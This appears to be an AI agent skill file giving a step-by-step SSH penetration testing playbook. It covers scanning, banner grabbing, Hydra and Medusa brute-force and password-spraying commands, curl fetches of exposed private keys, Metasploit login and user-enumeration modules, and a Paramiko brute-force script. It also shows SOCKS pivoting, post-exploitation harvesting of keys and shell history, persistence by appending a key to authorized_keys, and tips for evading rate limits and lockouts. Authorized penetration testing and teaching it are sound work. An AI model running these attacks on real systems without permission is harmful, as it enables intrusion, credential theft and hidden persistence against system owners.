SSH Penetration Testing

1---
2name: SSH Penetration Testing
3description: This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". It provides comprehensive SSH penetration testing methodologies and techniques.
4metadata:
5  author: zebbern
6  version: "1.1"
7---
8 
9# SSH Penetration Testing
10 
11## Purpose
12 
13Conduct comprehensive SSH security assessments including enumeration, credential attacks, vulnerability exploitation, tunneling techniques, and post-exploitation activities. This skill covers the complete methodology for testing SSH service security.
14 
15## Prerequisites
16 
17### Required Tools
18- Nmap with SSH scripts
19- Hydra or Medusa for brute-forcing
20- ssh-audit for configuration analysis
21- Metasploit Framework
22- Python with Paramiko library
23 
24### Required Knowledge
25- SSH protocol fundamentals
26- Public/private key authentication
27- Port forwarding concepts
28- Linux command-line proficiency
29 
30## Outputs and Deliverables
31 
321. **SSH Enumeration Report** - Versions, algorithms, configurations
332. **Credential Assessment** - Weak passwords, default credentials
343. **Vulnerability Assessment** - Known CVEs, misconfigurations
354. **Tunnel Documentation** - Port forwarding configurations
36 
37## Core Workflow
38 
39### Phase 1: SSH Service Discovery
40 
41Identify SSH services on target networks:
42 
43```bash
44# Quick SSH port scan
45nmap -p 22 192.168.1.0/24 --open
46 
47# Common alternate SSH ports
48nmap -p 22,2222,22222,2200 192.168.1.100
49 
50# Full port scan for SSH
51nmap -p- --open 192.168.1.100 | grep -i ssh
52 
53# Service version detection
54nmap -sV -p 22 192.168.1.100
55```
56 
57### Phase 2: SSH Enumeration
58 
59Gather detailed information about SSH services:
60 
61```bash
62# Banner grabbing
63nc 192.168.1.100 22
64# Output: SSH-2.0-OpenSSH_8.4p1 Debian-5
65 
66# Telnet banner grab
67telnet 192.168.1.100 22
68 
69# Nmap version detection with scripts
70nmap -sV -p 22 --script ssh-hostkey 192.168.1.100
71 
72# Enumerate supported algorithms
73nmap -p 22 --script ssh2-enum-algos 192.168.1.100
74 
75# Get host keys
76nmap -p 22 --script ssh-hostkey --script-args ssh_hostkey=full 192.168.1.100
77 
78# Check authentication methods
79nmap -p 22 --script ssh-auth-methods --script-args="ssh.user=root" 192.168.1.100
80```
81 
82### Phase 3: SSH Configuration Auditing
83 
84Identify weak configurations:
85 
86```bash
87# ssh-audit - comprehensive SSH audit
88ssh-audit 192.168.1.100
89 
90# ssh-audit with specific port
91ssh-audit -p 2222 192.168.1.100
92 
93# Output includes:
94# - Algorithm recommendations
95# - Security vulnerabilities
96# - Hardening suggestions
97```
98 
99Key configuration weaknesses to identify:
100- Weak key exchange algorithms (diffie-hellman-group1-sha1)
101- Weak ciphers (arcfour, 3des-cbc)
102- Weak MACs (hmac-md5, hmac-sha1-96)
103- Deprecated protocol versions
104 
105### Phase 4: Credential Attacks
106 
107#### Brute-Force with Hydra
108 
109```bash
110# Single username, password list
111hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
112 
113# Username list, single password
114hydra -L users.txt -p Password123 ssh://192.168.1.100
115 
116# Username and password lists
117hydra -L users.txt -P passwords.txt ssh://192.168.1.100
118 
119# With specific port
120hydra -l admin -P passwords.txt -s 2222 ssh://192.168.1.100
121 
122# Rate limiting evasion (slow)
123hydra -l admin -P passwords.txt -t 1 -w 5 ssh://192.168.1.100
124 
125# Verbose output
126hydra -l admin -P passwords.txt -vV ssh://192.168.1.100
127 
128# Exit on first success
129hydra -l admin -P passwords.txt -f ssh://192.168.1.100
130```
131 
132#### Brute-Force with Medusa
133 
134```bash
135# Basic brute-force
136medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh
137 
138# Multiple targets
139medusa -H targets.txt -u admin -P passwords.txt -M ssh
140 
141# With username list
142medusa -h 192.168.1.100 -U users.txt -P passwords.txt -M ssh
143 
144# Specific port
145medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh -n 2222
146```
147 
148#### Password Spraying
149 
150```bash
151# Test common password across users
152hydra -L users.txt -p Summer2024! ssh://192.168.1.100
153 
154# Multiple common passwords
155for pass in "Password123" "Welcome1" "Summer2024!"; do
156    hydra -L users.txt -p "$pass" ssh://192.168.1.100
157done
158```
159 
160### Phase 5: Key-Based Authentication Testing
161 
162Test for weak or exposed keys:
163 
164```bash
165# Attempt login with found private key
166ssh -i id_rsa user@192.168.1.100
167 
168# Specify key explicitly (bypass agent)
169ssh -o IdentitiesOnly=yes -i id_rsa user@192.168.1.100
170 
171# Force password authentication
172ssh -o PreferredAuthentications=password user@192.168.1.100
173 
174# Try common key names
175for key in id_rsa id_dsa id_ecdsa id_ed25519; do
176    ssh -i "$key" user@192.168.1.100
177done
178```
179 
180Check for exposed keys:
181 
182```bash
183# Common locations for private keys
184~/.ssh/id_rsa
185~/.ssh/id_dsa
186~/.ssh/id_ecdsa
187~/.ssh/id_ed25519
188/etc/ssh/ssh_host_*_key
189/root/.ssh/
190/home/*/.ssh/
191 
192# Web-accessible keys (check with curl/wget)
193curl -s http://target.com/.ssh/id_rsa
194curl -s http://target.com/id_rsa
195curl -s http://target.com/backup/ssh_keys.tar.gz
196```
197 
198### Phase 6: Vulnerability Exploitation
199 
200Search for known vulnerabilities:
201 
202```bash
203# Search for exploits
204searchsploit openssh
205searchsploit openssh 7.2
206 
207# Common SSH vulnerabilities
208# CVE-2018-15473 - Username enumeration
209# CVE-2016-0777 - Roaming vulnerability
210# CVE-2016-0778 - Buffer overflow
211 
212# Metasploit enumeration
213msfconsole
214use auxiliary/scanner/ssh/ssh_version
215set RHOSTS 192.168.1.100
216run
217 
218# Username enumeration (CVE-2018-15473)
219use auxiliary/scanner/ssh/ssh_enumusers
220set RHOSTS 192.168.1.100
221set USER_FILE /usr/share/wordlists/users.txt
222run
223```
224 
225### Phase 7: SSH Tunneling and Port Forwarding
226 
227#### Local Port Forwarding
228 
229Forward local port to remote service:
230 
231```bash
232# Syntax: ssh -L <local_port>:<remote_host>:<remote_port> user@ssh_server
233 
234# Access internal web server through SSH
235ssh -L 8080:192.168.1.50:80 user@192.168.1.100
236# Now access http://localhost:8080
237 
238# Access internal database
239ssh -L 3306:192.168.1.50:3306 user@192.168.1.100
240 
241# Multiple forwards
242ssh -L 8080:192.168.1.50:80 -L 3306:192.168.1.51:3306 user@192.168.1.100
243```
244 
245#### Remote Port Forwarding
246 
247Expose local service to remote network:
248 
249```bash
250# Syntax: ssh -R <remote_port>:<local_host>:<local_port> user@ssh_server
251 
252# Expose local web server to remote
253ssh -R 8080:localhost:80 user@192.168.1.100
254# Remote can access via localhost:8080
255 
256# Reverse shell callback
257ssh -R 4444:localhost:4444 user@192.168.1.100
258```
259 
260#### Dynamic Port Forwarding (SOCKS Proxy)
261 
262Create SOCKS proxy for network pivoting:
263 
264```bash
265# Create SOCKS proxy on local port 1080
266ssh -D 1080 user@192.168.1.100
267 
268# Use with proxychains
269echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
270proxychains nmap -sT -Pn 192.168.1.0/24
271 
272# Browser configuration
273# Set SOCKS proxy to localhost:1080
274```
275 
276#### ProxyJump (Jump Hosts)
277 
278Chain through multiple SSH servers:
279 
280```bash
281# Jump through intermediate host
282ssh -J user1@jump_host user2@target_host
283 
284# Multiple jumps
285ssh -J user1@jump1,user2@jump2 user3@target
286 
287# With SSH config
288# ~/.ssh/config
289Host target
290    HostName 192.168.2.50
291    User admin
292    ProxyJump user@192.168.1.100
293```
294 
295### Phase 8: Post-Exploitation
296 
297Activities after gaining SSH access:
298 
299```bash
300# Check sudo privileges
301sudo -l
302 
303# Find SSH keys
304find / -name "id_rsa" 2>/dev/null
305find / -name "id_dsa" 2>/dev/null
306find / -name "authorized_keys" 2>/dev/null
307 
308# Check SSH directory
309ls -la ~/.ssh/
310cat ~/.ssh/known_hosts
311cat ~/.ssh/authorized_keys
312 
313# Add persistence (add your key)
314echo "ssh-rsa AAAAB3..." >> ~/.ssh/authorized_keys
315 
316# Extract SSH configuration
317cat /etc/ssh/sshd_config
318 
319# Find other users
320cat /etc/passwd | grep -v nologin
321ls /home/
322 
323# History for credentials
324cat ~/.bash_history | grep -i ssh
325cat ~/.bash_history | grep -i pass
326```
327 
328### Phase 9: Custom SSH Scripts with Paramiko
329 
330Python-based SSH automation:
331 
332```python
333#!/usr/bin/env python3
334import paramiko
335import sys
336 
337def ssh_connect(host, username, password):
338    """Attempt SSH connection with credentials"""
339    client = paramiko.SSHClient()
340    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
341    
342    try:
343        client.connect(host, username=username, password=password, timeout=5)
344        print(f"[+] Success: {username}:{password}")
345        return client
346    except paramiko.AuthenticationException:
347        print(f"[-] Failed: {username}:{password}")
348        return None
349    except Exception as e:
350        print(f"[!] Error: {e}")
351        return None
352 
353def execute_command(client, command):
354    """Execute command via SSH"""
355    stdin, stdout, stderr = client.exec_command(command)
356    output = stdout.read().decode()
357    errors = stderr.read().decode()
358    return output, errors
359 
360def ssh_brute_force(host, username, wordlist):
361    """Brute-force SSH with wordlist"""
362    with open(wordlist, 'r') as f:
363        passwords = f.read().splitlines()
364    
365    for password in passwords:
366        client = ssh_connect(host, username, password.strip())
367        if client:
368            # Run post-exploitation commands
369            output, _ = execute_command(client, 'id; uname -a')
370            print(output)
371            client.close()
372            return True
373    return False
374 
375# Usage
376if __name__ == "__main__":
377    target = "192.168.1.100"
378    user = "admin"
379    
380    # Single credential test
381    client = ssh_connect(target, user, "password123")
382    if client:
383        output, _ = execute_command(client, "ls -la")
384        print(output)
385        client.close()
386```
387 
388### Phase 10: Metasploit SSH Modules
389 
390Use Metasploit for comprehensive SSH testing:
391 
392```bash
393# Start Metasploit
394msfconsole
395 
396# SSH Version Scanner
397use auxiliary/scanner/ssh/ssh_version
398set RHOSTS 192.168.1.0/24
399run
400 
401# SSH Login Brute-Force
402use auxiliary/scanner/ssh/ssh_login
403set RHOSTS 192.168.1.100
404set USERNAME admin
405set PASS_FILE /usr/share/wordlists/rockyou.txt
406set VERBOSE true
407run
408 
409# SSH Key Login
410use auxiliary/scanner/ssh/ssh_login_pubkey
411set RHOSTS 192.168.1.100
412set USERNAME admin
413set KEY_FILE /path/to/id_rsa
414run
415 
416# Username Enumeration
417use auxiliary/scanner/ssh/ssh_enumusers
418set RHOSTS 192.168.1.100
419set USER_FILE users.txt
420run
421 
422# Post-exploitation with SSH session
423sessions -i 1
424```
425 
426## Quick Reference
427 
428### SSH Enumeration Commands
429 
430| Command | Purpose |
431|---------|---------|
432| `nc <host> 22` | Banner grabbing |
433| `ssh-audit <host>` | Configuration audit |
434| `nmap --script ssh*` | SSH NSE scripts |
435| `searchsploit openssh` | Find exploits |
436 
437### Brute-Force Options
438 
439| Tool | Command |
440|------|---------|
441| Hydra | `hydra -l user -P pass.txt ssh://host` |
442| Medusa | `medusa -h host -u user -P pass.txt -M ssh` |
443| Ncrack | `ncrack -p 22 --user admin -P pass.txt host` |
444| Metasploit | `use auxiliary/scanner/ssh/ssh_login` |
445 
446### Port Forwarding Types
447 
448| Type | Command | Use Case |
449|------|---------|----------|
450| Local | `-L 8080:target:80` | Access remote services locally |
451| Remote | `-R 8080:localhost:80` | Expose local services remotely |
452| Dynamic | `-D 1080` | SOCKS proxy for pivoting |
453 
454### Common SSH Ports
455 
456| Port | Description |
457|------|-------------|
458| 22 | Default SSH |
459| 2222 | Common alternate |
460| 22222 | Another alternate |
461| 830 | NETCONF over SSH |
462 
463## Constraints and Limitations
464 
465### Legal Considerations
466- Always obtain written authorization
467- Brute-forcing may violate ToS
468- Document all testing activities
469 
470### Technical Limitations
471- Rate limiting may block attacks
472- Fail2ban or similar may ban IPs
473- Key-based auth prevents password attacks
474- Two-factor authentication adds complexity
475 
476### Evasion Techniques
477- Use slow brute-force: `-t 1 -w 5`
478- Distribute attacks across IPs
479- Use timing-based enumeration carefully
480- Respect lockout thresholds
481 
482## Troubleshooting
483 
484| Issue | Solutions |
485|-------|-----------|
486| Connection Refused | Verify SSH running; check firewall; confirm port; test from different IP |
487| Authentication Failures | Verify username; check password policy; key permissions (600); authorized_keys format |
488| Tunnel Not Working | Check GatewayPorts/AllowTcpForwarding in sshd_config; verify firewall; use `ssh -v` |
489